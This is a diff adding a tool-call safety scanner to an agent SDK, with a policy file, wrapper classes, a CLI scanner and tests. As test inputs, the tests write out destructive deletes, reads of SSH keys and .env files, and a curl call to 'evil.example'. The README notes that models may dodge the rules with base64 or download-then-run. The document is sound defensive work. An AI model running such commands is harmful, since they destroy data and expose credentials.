diff --git a/examples/tool_safety/README.md b/examples/tool_safety/README.md new file mode 100644 index 00000000..72ddc89d --- /dev/null +++ b/examples/tool_safety/README.md @@ -0,0 +1,209 @@ +# Tool Safety Guard 示例 + +本示例说明 Tool Safety Guard 的设计目标、使用方式和交付物。它用于在工具调用、代码执行、技能执行、脚本扫描等入口执行确定性的安全检查,并输出结构化结果、Telemetry 属性和审计记录。 + +## 背景与设计目标 + +Agent 工具通常可以执行文件操作、Shell 命令、网络请求或依赖安装。此类能力很有用,但也会带来误删文件、泄露密钥、访问非预期网络、无限循环或资源滥用等风险。 + +Tool Safety Guard 的目标是: + +- 在高风险操作执行前给出确定性判断。 +- 让工具调用、CodeExecutor、Skill 执行和 CLI 扫描复用同一套审查逻辑。 +- 为 CI 和开发流程提供结构化输出与明确退出码。 +- 记录可观测属性和审计事件,便于排查与合规留痕。 +- 保持轻量:不替代沙箱,不引入新的 Telemetry 框架。 + +## 整体架构 + +```text +SafetyReviewer + ↓ +Rule + ↓ +Policy + ↓ +ToolSafetyFilter +CodeExecutor Wrapper +Skill Wrapper + ↓ +Telemetry +Audit +``` + +- `SafetyReviewer` 是统一入口,接收待检查文本、动作类型和工具名,返回结构化 review。 +- `Rule` 提供确定性模式匹配。 +- `Policy` 提供 allowlist、blocked path 和风险等级配置。 +- `ToolSafetyFilter` 用于已有工具过滤器链。 +- `CodeExecutor Wrapper` 和 `Skill Wrapper` 用于没有 Filter 能力的执行入口。 +- Telemetry 将安全判断写入当前 OpenTelemetry span。 +- Audit 用于保存离线审计记录。 + +## Rule 分类 + +### 文件操作 + +文件类规则关注破坏性删除、敏感路径读取和大文件写入。例如删除目录、访问 `.env`、访问 SSH 私钥路径,或写入异常大的文件内容。 + +### 网络访问 + +网络类规则关注直接访问外部域名、使用非 allowlist 域名、`wget`、原始 socket、`aiohttp` 客户端等行为。允许访问的域名应通过 Policy 显式配置。 + +### 系统命令 + +系统命令类规则关注 `os.system`、Python 子进程调用、Shell 管道、命令串联、`sudo`、`systemctl`、部署或生产环境关键字等高风险模式。 + +### 依赖安装 + +依赖安装类规则关注 `pip install`、`npm install`、`apt install` 等会修改环境的命令。默认结果通常是 `needs_human_review`,由人确认是否允许继续。 + +### 资源滥用 + +资源类规则关注无限循环、过高并发、过大文件写入、递归进程生成等可能导致资源耗尽的行为。 + +### 敏感信息泄露 + +敏感信息类规则关注打印环境变量、token、password、secret、api key 等内容,避免工具输出把凭据带入模型上下文、日志或审计系统。 + +## Policy 配置说明 + +示例 Policy 位于 [tool_safety_policy.yaml](./tool_safety_policy.yaml)。 + +常用字段: + +- `allowed_domains`:允许访问的网络域名。域名会做规范化处理,子域名可被匹配。 +- `blocked_paths`:按规则 ID 配置禁止读取或访问的路径片段。 +- `allowed_commands`:保留给调用方或上层执行器使用的命令 allowlist。 +- `max_timeout`:保留给调用方或上层执行器使用的最大超时配置。 +- `max_output_size`:保留给调用方或上层执行器使用的最大输出大小配置。 +- `risk_levels`:按规则 ID 覆盖风险等级。 + +最小示例: + +```yaml +allowed_domains: + - api.example.com + +blocked_paths: + read_dotenv: + - ".env" + read_ssh: + - "~/.ssh" + +risk_levels: + network_not_allowlisted: critical +``` + +## CLI 使用示例 + +独立扫描命令位于 `scripts/tool_safety_check.py`。 + +扫描 Python 脚本: + +```bash +python scripts/tool_safety_check.py example.py +``` + +扫描 Bash 脚本: + +```bash +python scripts/tool_safety_check.py example.sh +``` + +指定 Policy: + +```bash +python scripts/tool_safety_check.py example.sh --policy examples/tool_safety/tool_safety_policy.yaml +``` + +输出 text 格式: + +```bash +python scripts/tool_safety_check.py example.sh --format text +``` + +写入 JSON report 文件: + +```bash +python scripts/tool_safety_check.py example.sh --output tool_safety_report.json +``` + +退出码约定: + +| Decision | Exit Code | 含义 | +| --- | ---: | --- | +| `allow` | 0 | 可继续执行 | +| `deny` | 1 | 阻断,CI 应失败 | +| `needs_human_review` | 2 | 需要人工审核 | + +## 如何新增 Rule + +新增 Rule 时应保持规则小而明确: + +1. 明确风险场景和期望 decision。 +2. 添加稳定的 `rule_id`、`finding`、`recommendation` 和匹配模式。 +3. 在 Policy 的 `risk_levels` 中补充默认风险等级。 +4. 增加 allow、deny 或 `needs_human_review` 的单元测试。 +5. 确认 CLI、Filter、Wrapper 都通过 `SafetyReviewer` 自动复用该规则。 + +Rule 不应承担执行隔离职责,也不应读取系统状态。它只做输入文本审查。 + +## Tool Filter 与 Wrapper 的区别 + +`ToolSafetyFilter` 用于已经接入框架工具过滤器链的 `BaseTool`。它在工具执行前运行,命中阻断时返回结构化工具错误。 + +Wrapper 用于没有 Filter 能力的入口,例如直接调用 `CodeExecutor.execute_code()`,或直接运行某个 Skill runner。Wrapper 通过组合方式包住原执行入口,不改变底层执行器。 + +两者的共同点: + +- 都复用 `SafetyReviewer`。 +- 都复用同一套 Rule 和 Policy。 +- 都输出相同风格的安全 decision。 +- 都写入相同的 Telemetry attributes。 + +## Telemetry + +安全检查完成后,会向当前 OpenTelemetry span 写入以下 attributes: + +- `tool.safety.decision` +- `tool.safety.risk_level` +- `tool.safety.rule_id` + +如果当前环境未启用 OpenTelemetry,写入会退化为 no-op,不影响工具执行或 CLI 扫描。 + +## Audit + +示例审计文件位于 [tool_safety_audit.jsonl](./tool_safety_audit.jsonl)。每行是一条 JSON 记录,便于流式写入和日志系统采集。 + +稳定字段包括: + +- `tool_name` +- `decision` +- `risk_level` +- `rule_id` +- `blocked` +- `latency` +- `timestamp` +- `input_sha256` + +示例 report 位于 [tool_safety_report.json](./tool_safety_report.json),包含 `allow`、`deny`、`needs_human_review` 三类结果,可作为 README 或 Issue 的结构化输出示例。 + +## 已知限制 + +### 误报 + +规则基于确定性模式匹配,可能把安全的命令片段判为高风险。例如文档中展示的危险命令、测试字符串或被转义的示例代码。 + +### 漏报 + +规则无法覆盖所有语言语义、动态拼接、编码混淆、间接调用或运行时生成命令。复杂攻击可能绕过静态文本匹配。 + +### 绕过风险 + +模型或用户可以尝试通过变量拼接、base64、下载后执行、跨文件组合等方式绕过规则。Policy allowlist 也可能因配置过宽降低防护效果。 + +## 为什么 Safety Guard 不能替代 Sandbox + +Safety Guard 是执行前的静态审查层,适合快速阻断明显风险和输出可观测证据。它不能提供进程隔离、文件系统隔离、网络隔离、权限隔离或资源配额。 + +生产环境仍应使用 Sandbox、容器、只读挂载、网络策略、最小权限凭据、资源限制和人工审核流程。Safety Guard 应作为 Sandbox 之前的一层防线,而不是 Sandbox 的替代品。 diff --git a/examples/tool_safety/samples/allow.py b/examples/tool_safety/samples/allow.py new file mode 100644 index 00000000..66f066fa --- /dev/null +++ b/examples/tool_safety/samples/allow.py @@ -0,0 +1 @@ +print('hello from tool safety') diff --git a/examples/tool_safety/samples/deny.sh b/examples/tool_safety/samples/deny.sh new file mode 100644 index 00000000..365113e6 --- /dev/null +++ b/examples/tool_safety/samples/deny.sh @@ -0,0 +1,2 @@ +# Inert sample: rm -rf /tmp/demo +printf '%s\n' 'destructive delete sample is intentionally not executed' diff --git a/examples/tool_safety/samples/needs_human_review.sh b/examples/tool_safety/samples/needs_human_review.sh new file mode 100644 index 00000000..d6cc63ab --- /dev/null +++ b/examples/tool_safety/samples/needs_human_review.sh @@ -0,0 +1,2 @@ +# Inert sample: npm install left-pad +printf '%s\n' 'dependency install sample is intentionally not executed' diff --git a/examples/tool_safety/tool_safety_audit.jsonl b/examples/tool_safety/tool_safety_audit.jsonl new file mode 100644 index 00000000..74cbd99a --- /dev/null +++ b/examples/tool_safety/tool_safety_audit.jsonl @@ -0,0 +1,3 @@ +{"action_type": "python", "allowed_domains": [], "blocked": false, "case": "allow_python", "decision": "allow", "desensitized": false, "input_sha256": "7523adf6df9ff2c18a6116b069e77f4fe8d273a980a0a4610f904e4809ddffa3", "latency": 3.5e-05, "risk_level": "none", "rule_id": "safe_python", "rules_evaluated": ["safe_python", "network_allowlist", "network_not_allowlisted", "read_dotenv", "read_ssh", "dangerous_delete", "subprocess_execution", "os_system_execution", "package_install", "npm_install", "apt_install", "infinite_loop", "sensitive_output", "wget_network", "aiohttp_network", "socket_network", "fork_bomb", "bash_pipe", "shell_injection", "excessive_concurrency", "large_file_write", "human_review_required"], "timestamp": "2026-07-01T00:00:00Z", "tool_name": "tool_safety_check"} +{"action_type": "bash", "allowed_domains": [], "blocked": true, "case": "deny_bash", "decision": "deny", "desensitized": false, "input_sha256": "6ac440d686cb1abc7d1be8778126fcd67d01fc279fa5ce75a90065778209adc1", "latency": 0.000153, "risk_level": "critical", "rule_id": "dangerous_delete", "rules_evaluated": ["safe_python", "network_allowlist", "network_not_allowlisted", "read_dotenv", "read_ssh", "dangerous_delete", "subprocess_execution", "os_system_execution", "package_install", "npm_install", "apt_install", "infinite_loop", "sensitive_output", "wget_network", "aiohttp_network", "socket_network", "fork_bomb", "bash_pipe", "shell_injection", "excessive_concurrency", "large_file_write", "human_review_required"], "timestamp": "2026-07-01T00:00:01Z", "tool_name": "tool_safety_check"} +{"action_type": "bash", "allowed_domains": [], "blocked": true, "case": "needs_human_review_bash", "decision": "needs_human_review", "desensitized": false, "input_sha256": "e5e6076a68ab5cc084360b7b1d92875e83d64bbf48090db0eb7c3e6ea0e03b74", "latency": 2e-05, "risk_level": "medium", "rule_id": "npm_install", "rules_evaluated": ["safe_python", "network_allowlist", "network_not_allowlisted", "read_dotenv", "read_ssh", "dangerous_delete", "subprocess_execution", "os_system_execution", "package_install", "npm_install", "apt_install", "infinite_loop", "sensitive_output", "wget_network", "aiohttp_network", "socket_network", "fork_bomb", "bash_pipe", "shell_injection", "excessive_concurrency", "large_file_write", "human_review_required"], "timestamp": "2026-07-01T00:00:02Z", "tool_name": "tool_safety_check"} diff --git a/examples/tool_safety/tool_safety_policy.yaml b/examples/tool_safety/tool_safety_policy.yaml new file mode 100644 index 00000000..1a2487d5 --- /dev/null +++ b/examples/tool_safety/tool_safety_policy.yaml @@ -0,0 +1,43 @@ +allowed_domains: + - api.example.com + +blocked_paths: + read_dotenv: + - ".env" + - ".env.local" + read_ssh: + - "~/.ssh" + - ".ssh/" + +allowed_commands: + - bash + - echo + - python + - python3 + +max_timeout: 60 +max_output_size: 10000 + +risk_levels: + safe_python: none + dangerous_delete: critical + read_dotenv: high + read_ssh: critical + subprocess_execution: high + os_system_execution: high + package_install: medium + npm_install: medium + apt_install: medium + infinite_loop: high + sensitive_output: high + wget_network: high + aiohttp_network: high + socket_network: high + fork_bomb: critical + bash_pipe: medium + shell_injection: medium + excessive_concurrency: high + large_file_write: high + human_review_required: medium + network_allowlist: none + network_not_allowlisted: high diff --git a/examples/tool_safety/tool_safety_report.json b/examples/tool_safety/tool_safety_report.json new file mode 100644 index 00000000..53a0aa5c --- /dev/null +++ b/examples/tool_safety/tool_safety_report.json @@ -0,0 +1,39 @@ +{ + "generated_by": "SafetyReviewer + scripts/tool_safety_check.py report schema", + "reports": [ + { + "action_type": "python", + "case": "allow_python", + "decision": "allow", + "evidence": "", + "finding": "No risky code or command patterns detected.", + "path": "examples/tool_safety/samples/allow.py", + "recommendation": "Proceed with normal execution.", + "risk_level": "none", + "rule_id": "safe_python" + }, + { + "action_type": "bash", + "case": "deny_bash", + "decision": "deny", + "evidence": "rm -rf", + "finding": "Destructive delete operation detected.", + "path": "examples/tool_safety/samples/deny.sh", + "recommendation": "Do not run destructive deletes without explicit user approval and scoped paths.", + "risk_level": "critical", + "rule_id": "dangerous_delete" + }, + { + "action_type": "bash", + "case": "needs_human_review_bash", + "decision": "needs_human_review", + "evidence": "npm install", + "finding": "NPM package installation command detected.", + "path": "examples/tool_safety/samples/needs_human_review.sh", + "recommendation": "Send npm dependency installation through human review before mutating the environment.", + "risk_level": "medium", + "rule_id": "npm_install" + } + ], + "schema_version": 1 +} diff --git a/examples/tool_safety/wrappers.py b/examples/tool_safety/wrappers.py new file mode 100644 index 00000000..94fcc80c --- /dev/null +++ b/examples/tool_safety/wrappers.py @@ -0,0 +1,212 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Safety wrapper examples for execution paths that do not use filters. + +These wrappers intentionally live under ``examples``. They demonstrate how to +reuse the same deterministic ``SafetyReviewer`` used by ``ToolSafetyFilter`` +without changing the core CodeExecutor or Skill implementations. +""" + +from __future__ import annotations + +import inspect +import json +from typing import Any +from typing import Awaitable +from typing import Callable +from typing import Mapping +from typing import Protocol +from typing import Sequence + +from pydantic import Field + +from trpc_agent_sdk._tool_safety_telemetry import trace_tool_safety_review +from trpc_agent_sdk.code_executors import BaseCodeExecutor +from trpc_agent_sdk.code_executors import CodeBlock +from trpc_agent_sdk.code_executors import CodeExecutionInput +from trpc_agent_sdk.code_executors import CodeExecutionResult +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools.safety import SafetyReview +from trpc_agent_sdk.tools.safety import SafetyReviewer +from trpc_agent_sdk.types import Outcome + +_DEFAULT_BLOCK_DECISIONS = ("deny", "needs_human_review") + + +class SkillRunner(Protocol): + """Minimal protocol for skill-like execution entries.""" + + async def run_async(self, *, tool_context: InvocationContext, args: dict[str, Any]) -> Any: + """Run the skill entry.""" + + +SkillCallable = Callable[[InvocationContext, dict[str, Any]], Awaitable[Any] | Any] + + +class SafetyReviewedCodeExecutor(BaseCodeExecutor): + """Composition wrapper that reviews code before delegating execution.""" + + executor: BaseCodeExecutor = Field(exclude=True) + reviewer: SafetyReviewer = Field(default_factory=SafetyReviewer, exclude=True) + block_decisions: tuple[str, ...] = _DEFAULT_BLOCK_DECISIONS + + def __init__( + self, + executor: BaseCodeExecutor, + *, + reviewer: SafetyReviewer | None = None, + block_decisions: Sequence[str] = _DEFAULT_BLOCK_DECISIONS, + ) -> None: + super().__init__( + executor=executor, + reviewer=reviewer or SafetyReviewer(), + block_decisions=tuple(block_decisions), + optimize_data_file=executor.optimize_data_file, + stateful=executor.stateful, + error_retry_attempts=executor.error_retry_attempts, + execute_once_per_invocation=executor.execute_once_per_invocation, + code_block_delimiters=list(executor.code_block_delimiters), + execution_result_delimiters=list(executor.execution_result_delimiters), + workspace_runtime=executor.workspace_runtime, + ignore_codes=list(executor.ignore_codes), + ) + + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + """Review the code input and execute only when allowed.""" + review = self.reviewer.review( + _serialize_code_execution_input(code_execution_input), + action_type=_infer_code_action_type(code_execution_input), + tool_name="code_executor", + ) + trace_tool_safety_review(review) + if review.decision not in self.block_decisions: + return await self.executor.execute_code(invocation_context, code_execution_input) + return _blocked_code_execution_result(review) + + +class SafetyReviewedSkillRunner: + """Wrapper for direct skill execution entries that do not use filters.""" + + def __init__( + self, + runner: SkillRunner | SkillCallable, + *, + reviewer: SafetyReviewer | None = None, + block_decisions: Sequence[str] = _DEFAULT_BLOCK_DECISIONS, + tool_name: str = "skill_run", + ) -> None: + self._runner = runner + self._reviewer = reviewer or SafetyReviewer() + self._block_decisions = frozenset(block_decisions) + self._tool_name = tool_name + + @property + def reviewer(self) -> SafetyReviewer: + """Return the reviewer used by this wrapper.""" + return self._reviewer + + async def run(self, tool_context: InvocationContext, args: dict[str, Any]) -> Any: + """Review skill arguments and execute only when allowed.""" + review = self._reviewer.review( + _serialize_mapping(args), + action_type=_infer_skill_action_type(args), + tool_name=self._tool_name, + ) + trace_tool_safety_review(review) + if review.decision in self._block_decisions: + return _blocked_skill_response(review) + return await _call_skill_runner(self._runner, tool_context, args) + + +def _serialize_code_execution_input(code_execution_input: CodeExecutionInput) -> str: + parts: list[str] = [] + for block in _code_blocks(code_execution_input): + if block.language: + parts.append(f"language: {block.language}") + parts.append(block.code) + if code_execution_input.input_files: + parts.append(_serialize_mapping({"input_files": code_execution_input.input_files})) + return "\n".join(part for part in parts if part) + + +def _code_blocks(code_execution_input: CodeExecutionInput) -> list[CodeBlock]: + if code_execution_input.code_blocks: + return list(code_execution_input.code_blocks) + if code_execution_input.code: + return [CodeBlock(code=code_execution_input.code, language="python")] + return [] + + +def _infer_code_action_type(code_execution_input: CodeExecutionInput) -> str: + languages = {block.language.strip().lower() for block in _code_blocks(code_execution_input) if block.language} + if languages & {"bash", "sh", "shell", "zsh"}: + return "bash" + if languages & {"python", "py"}: + return "python" + return next(iter(languages), "code") + + +def _infer_skill_action_type(args: Mapping[str, Any]) -> str: + command = args.get("command") + if isinstance(command, str): + return "bash" + return "skill" + + +async def _call_skill_runner( + runner: SkillRunner | SkillCallable, + tool_context: InvocationContext, + args: dict[str, Any], +) -> Any: + if hasattr(runner, "run_async"): + result = runner.run_async(tool_context=tool_context, args=args) # type: ignore[attr-defined] + else: + result = runner(tool_context, args) # type: ignore[operator] + if inspect.isawaitable(result): + return await result + return result + + +def _serialize_mapping(value: Mapping[str, Any]) -> str: + return json.dumps(value, ensure_ascii=False, sort_keys=True, default=_json_default) + + +def _json_default(value: Any) -> Any: + if hasattr(value, "model_dump"): + return value.model_dump(mode="json") + return str(value) + + +def _blocked_code_execution_result(review: SafetyReview) -> CodeExecutionResult: + return CodeExecutionResult( + outcome=Outcome.OUTCOME_FAILED, + output=json.dumps(_blocked_response("CODE_EXECUTION", review), ensure_ascii=False, sort_keys=True), + ) + + +def _blocked_skill_response(review: SafetyReview) -> dict[str, Any]: + return _blocked_response("SKILL_EXECUTION", review) + + +def _blocked_response(prefix: str, review: SafetyReview) -> dict[str, Any]: + response: dict[str, Any] = { + "success": False, + "error": f"{prefix}_BLOCKED: {review.finding}", + "safety": review.report, + "safety_audit": review.audit, + } + if review.decision == "needs_human_review": + response["human_review"] = { + "required": True, + "status": "pending", + "finding": review.finding, + "recommendation": review.report.get("recommendation", ""), + } + return response diff --git a/scripts/tool_safety_check.py b/scripts/tool_safety_check.py new file mode 100644 index 00000000..11aa966e --- /dev/null +++ b/scripts/tool_safety_check.py @@ -0,0 +1,123 @@ +#!/usr/bin/env python3 +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Standalone Tool Safety scanner for scripts. + +Usage: + python scripts/tool_safety_check.py example.py + python scripts/tool_safety_check.py example.sh --policy tool_safety_policy.yaml +""" + +from __future__ import annotations + +import argparse +import json +import sys +from pathlib import Path +from typing import Any + +_PROJECT_ROOT = Path(__file__).resolve().parents[1] +if str(_PROJECT_ROOT) not in sys.path: + sys.path.insert(0, str(_PROJECT_ROOT)) + +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer + +_EXIT_CODES = { + "allow": 0, + "deny": 1, + "needs_human_review": 2, +} + + +def main(argv: list[str] | None = None) -> int: + """Run the Tool Safety scanner CLI.""" + parser = _build_parser() + args = parser.parse_args(argv) + + target = Path(args.path) + try: + source = target.read_text(encoding="utf-8") + except OSError as exc: + parser.error(f"unable to read {target}: {exc}") + + policy_path = Path(args.policy) if args.policy else None + if policy_path is not None and not policy_path.exists(): + parser.error(f"policy file not found: {policy_path}") + + reviewer = SafetyReviewer(policy_path=policy_path) + review = reviewer.review( + source, + action_type=_infer_action_type(target, source), + tool_name="tool_safety_check", + ) + report = _build_report(review, target) + + output_text = _format_report(report, args.format) + print(output_text) + + if args.output: + _write_json_report(Path(args.output), report) + + return _EXIT_CODES.get(review.decision, 1) + + +def _build_parser() -> argparse.ArgumentParser: + parser = argparse.ArgumentParser(description="Scan a Python or Bash script with Tool Safety rules.") + parser.add_argument("path", help="Python or Bash script to scan") + parser.add_argument("--policy", help="YAML Tool Safety policy file") + parser.add_argument( + "--format", + choices=("json", "text"), + default="json", + help="stdout report format (default: json)", + ) + parser.add_argument("--output", help="Write the JSON report to this file") + return parser + + +def _infer_action_type(path: Path, source: str) -> str: + suffix = path.suffix.lower() + if suffix == ".py": + return "python" + if suffix in {".sh", ".bash", ".zsh"}: + return "bash" + first_line = source.splitlines()[0] if source.splitlines() else "" + if "python" in first_line: + return "python" + if any(shell in first_line for shell in ("bash", "sh", "zsh")): + return "bash" + return "python" + + +def _build_report(review: SafetyReview, path: Path) -> dict[str, Any]: + return { + "path": str(path), + "decision": review.decision, + "risk_level": review.report.get("risk_level", ""), + "rule_id": review.rule_id, + "evidence": review.report.get("evidence", ""), + "recommendation": review.report.get("recommendation", ""), + "finding": review.finding, + } + + +def _format_report(report: dict[str, Any], output_format: str) -> str: + if output_format == "json": + return json.dumps(report, ensure_ascii=False, indent=2, sort_keys=True) + return "\n".join(f"{key}: {value}" for key, value in report.items()) + + +def _write_json_report(path: Path, report: dict[str, Any]) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text( + json.dumps(report, ensure_ascii=False, indent=2, sort_keys=True) + "\n", + encoding="utf-8", + ) + + +if __name__ == "__main__": + sys.exit(main()) diff --git a/tests/server/openclaw/tools/test_safety_review.py b/tests/server/openclaw/tools/test_safety_review.py new file mode 100644 index 00000000..8d371d40 --- /dev/null +++ b/tests/server/openclaw/tools/test_safety_review.py @@ -0,0 +1,226 @@ +"""Tests for structured OpenClaw safety review decisions.""" + +from __future__ import annotations + +import hashlib + +from trpc_agent_sdk.server.openclaw import SafetyReviewer + + +def _assert_review( + *, + source: str, + action_type: str, + decision: str, + rule_id: str, + finding: str, + risk_level: str, + tool_name: str = "test_tool", + allowed_domains: tuple[str, ...] = ("api.example.com", ), +) -> None: + reviewer = SafetyReviewer(allowed_domains=allowed_domains) + + review = reviewer.review(source, action_type=action_type, tool_name=tool_name) + blocked = decision in {"deny", "needs_human_review"} + + assert review.decision == decision + assert review.rule_id == rule_id + assert finding in review.finding + + assert review.report["decision"] == decision + assert review.report["rule_id"] == rule_id + assert review.report["finding"] == review.finding + assert review.report["risk_level"] == risk_level + assert review.report["tool_name"] == tool_name + assert review.report["blocked"] is blocked + assert isinstance(review.report["latency"], float) + assert review.report["latency"] >= 0.0 + assert isinstance(review.report["desensitized"], bool) + assert review.report["recommendation"] + assert "evidence" in review.report + + assert review.audit["decision"] == decision + assert review.audit["rule_id"] == rule_id + assert review.audit["risk_level"] == risk_level + assert review.audit["tool_name"] == tool_name + assert review.audit["blocked"] is blocked + assert isinstance(review.audit["latency"], float) + assert review.audit["latency"] >= 0.0 + assert isinstance(review.audit["desensitized"], bool) + assert review.audit["action_type"] == action_type + assert review.audit["input_sha256"] == hashlib.sha256(source.encode("utf-8")).hexdigest() + assert review.audit["allowed_domains"] == sorted(allowed_domains) + assert rule_id in review.audit["rules_evaluated"] + + +def test_safe_python_allows_and_reports_audit() -> None: + source = "result = sum([1, 2, 3])\nprint(result)" + + _assert_review( + source=source, + action_type="python", + decision="allow", + rule_id="safe_python", + finding="No risky code", + risk_level="none", + ) + + +def test_dangerous_delete_blocks_with_rule_finding_report_and_audit() -> None: + source = "rm -rf /tmp/project" + + _assert_review( + source=source, + action_type="bash", + decision="deny", + rule_id="dangerous_delete", + finding="Destructive delete", + risk_level="critical", + ) + + +def test_read_dotenv_blocks_with_rule_finding_report_and_audit() -> None: + source = "from pathlib import Path\nprint(Path('.env').read_text())" + + _assert_review( + source=source, + action_type="python", + decision="deny", + rule_id="read_dotenv", + finding="environment secret file", + risk_level="high", + ) + + +def test_read_home_ssh_blocks_with_rule_finding_report_and_audit() -> None: + source = "cat ~/.ssh/id_rsa" + + _assert_review( + source=source, + action_type="bash", + decision="deny", + rule_id="read_ssh", + finding="SSH credentials", + risk_level="critical", + ) + + +def test_allowlisted_network_request_allows_with_rule_finding_report_and_audit() -> None: + source = "import requests\nrequests.get('https://api.example.com/v1/status')" + + _assert_review( + source=source, + action_type="python", + decision="allow", + rule_id="network_allowlist", + finding="allowlisted domain", + risk_level="none", + ) + + +def test_non_allowlisted_network_request_blocks_with_rule_finding_report_and_audit() -> None: + source = "curl https://evil.example/download" + + _assert_review( + source=source, + action_type="bash", + decision="deny", + rule_id="network_not_allowlisted", + finding="non-allowlisted domain", + risk_level="high", + ) + + +def test_subprocess_blocks_with_rule_finding_report_and_audit() -> None: + source = "import subprocess\nsubprocess.run(['sh', '-c', 'echo hi'])" + + _assert_review( + source=source, + action_type="python", + decision="deny", + rule_id="subprocess_execution", + finding="Subprocess execution", + risk_level="high", + ) + + +def test_pip_install_requires_review_with_rule_finding_report_and_audit() -> None: + source = "python -m pip install requests" + + _assert_review( + source=source, + action_type="bash", + decision="needs_human_review", + rule_id="package_install", + finding="Package installation", + risk_level="medium", + ) + + +def test_infinite_loop_blocks_with_rule_finding_report_and_audit() -> None: + source = "while True:\n pass" + + _assert_review( + source=source, + action_type="python", + decision="deny", + rule_id="infinite_loop", + finding="unbounded loop", + risk_level="high", + ) + + +def test_sensitive_information_output_blocks_with_rule_finding_report_and_audit() -> None: + source = "api_key = 'sk-live-secret'\nprint(api_key)" + + reviewer = SafetyReviewer(allowed_domains=("api.example.com", )) + review = reviewer.review(source, action_type="python", tool_name="secret_tool") + + assert review.decision == "deny" + assert review.rule_id == "sensitive_output" + assert "sensitive information output" in review.finding + assert review.report["decision"] == "deny" + assert review.report["rule_id"] == "sensitive_output" + assert review.report["finding"] == review.finding + assert review.report["risk_level"] == "high" + assert review.report["tool_name"] == "secret_tool" + assert review.report["blocked"] is True + assert isinstance(review.report["latency"], float) + assert isinstance(review.report["desensitized"], bool) + assert review.audit["decision"] == "deny" + assert review.audit["rule_id"] == "sensitive_output" + assert review.audit["risk_level"] == "high" + assert review.audit["tool_name"] == "secret_tool" + assert review.audit["blocked"] is True + assert isinstance(review.audit["latency"], float) + assert isinstance(review.audit["desensitized"], bool) + assert review.audit["action_type"] == "python" + assert review.audit["input_sha256"] == hashlib.sha256(source.encode("utf-8")).hexdigest() + assert "sk-live-secret" not in str(review.report) + assert "sk-live-secret" not in str(review.audit) + + +def test_bash_pipe_requires_review_with_rule_finding_report_and_audit() -> None: + source = "printf 'hello' | wc -c" + + _assert_review( + source=source, + action_type="bash", + decision="needs_human_review", + rule_id="bash_pipe", + finding="Bash pipeline", + risk_level="medium", + ) + + +def test_human_review_scenario_requires_review_with_rule_finding_report_and_audit() -> None: + source = "sudo systemctl restart production-api" + + _assert_review( + source=source, + action_type="bash", + decision="needs_human_review", + rule_id="human_review_required", + finding="requires human review", + risk_level="medium", + ) diff --git a/tests/tools/safety/test_cli.py b/tests/tools/safety/test_cli.py new file mode 100644 index 00000000..834b9acd --- /dev/null +++ b/tests/tools/safety/test_cli.py @@ -0,0 +1,130 @@ +"""Tests for the standalone Tool Safety scanner CLI.""" + +from __future__ import annotations + +import importlib.util +import json +import time +from pathlib import Path + +import pytest + + +def _load_cli_module(): + script_path = Path(__file__).resolve().parents[3] / "scripts" / "tool_safety_check.py" + spec = importlib.util.spec_from_file_location("tool_safety_check", script_path) + module = importlib.util.module_from_spec(spec) + assert spec.loader is not None + spec.loader.exec_module(module) + return module + + +def test_cli_allows_safe_python_script(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "safe.py" + script.write_text("print('hello')\n", encoding="utf-8") + + exit_code = cli.main([str(script)]) + + output = json.loads(capsys.readouterr().out) + assert exit_code == 0 + assert output["decision"] == "allow" + assert output["risk_level"] == "none" + assert output["rule_id"] == "safe_python" + + +def test_cli_allows_safe_bash_script_text_format(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "safe.sh" + script.write_text("echo hello\n", encoding="utf-8") + + exit_code = cli.main([str(script), "--format", "text"]) + + output = capsys.readouterr().out + assert exit_code == 0 + assert "decision: allow" in output + assert "risk_level: none" in output + assert "rule_id: safe_python" in output + + +def test_cli_returns_one_for_deny(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "danger.sh" + script.write_text("rm -rf /tmp/demo\n", encoding="utf-8") + + exit_code = cli.main([str(script)]) + + output = json.loads(capsys.readouterr().out) + assert exit_code == 1 + assert output["decision"] == "deny" + assert output["risk_level"] == "critical" + assert output["rule_id"] == "dangerous_delete" + assert output["evidence"] + assert output["recommendation"] + + +def test_cli_returns_two_for_needs_human_review(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "install.sh" + script.write_text("npm install left-pad\n", encoding="utf-8") + + exit_code = cli.main([str(script)]) + + output = json.loads(capsys.readouterr().out) + assert exit_code == 2 + assert output["decision"] == "needs_human_review" + assert output["rule_id"] == "npm_install" + + +def test_cli_loads_policy_and_writes_json_report(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "fetch.sh" + policy = tmp_path / "policy.yaml" + report_file = tmp_path / "reports" / "tool_safety.json" + script.write_text("curl https://api.example.com/data\n", encoding="utf-8") + policy.write_text( + """ +allowed_domains: + - api.example.com +""", + encoding="utf-8", + ) + + exit_code = cli.main([str(script), "--policy", str(policy), "--output", str(report_file)]) + + stdout_report = json.loads(capsys.readouterr().out) + file_report = json.loads(report_file.read_text(encoding="utf-8")) + assert exit_code == 0 + assert stdout_report["decision"] == "allow" + assert stdout_report["rule_id"] == "network_allowlist" + assert file_report == stdout_report + + +def test_cli_rejects_explicit_missing_policy_file(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "safe.py" + missing_policy = tmp_path / "missing.yaml" + script.write_text("print('hello')\n", encoding="utf-8") + + with pytest.raises(SystemExit) as exc_info: + cli.main([str(script), "--policy", str(missing_policy)]) + + captured = capsys.readouterr() + assert exc_info.value.code == 2 + assert "policy file not found" in captured.err + assert str(missing_policy) in captured.err + + +def test_cli_scans_500_line_script_under_one_second(tmp_path, capsys) -> None: + cli = _load_cli_module() + script = tmp_path / "large_safe.py" + script.write_text("\n".join("print('hello')" for _ in range(500)) + "\n", encoding="utf-8") + + started_at = time.perf_counter() + exit_code = 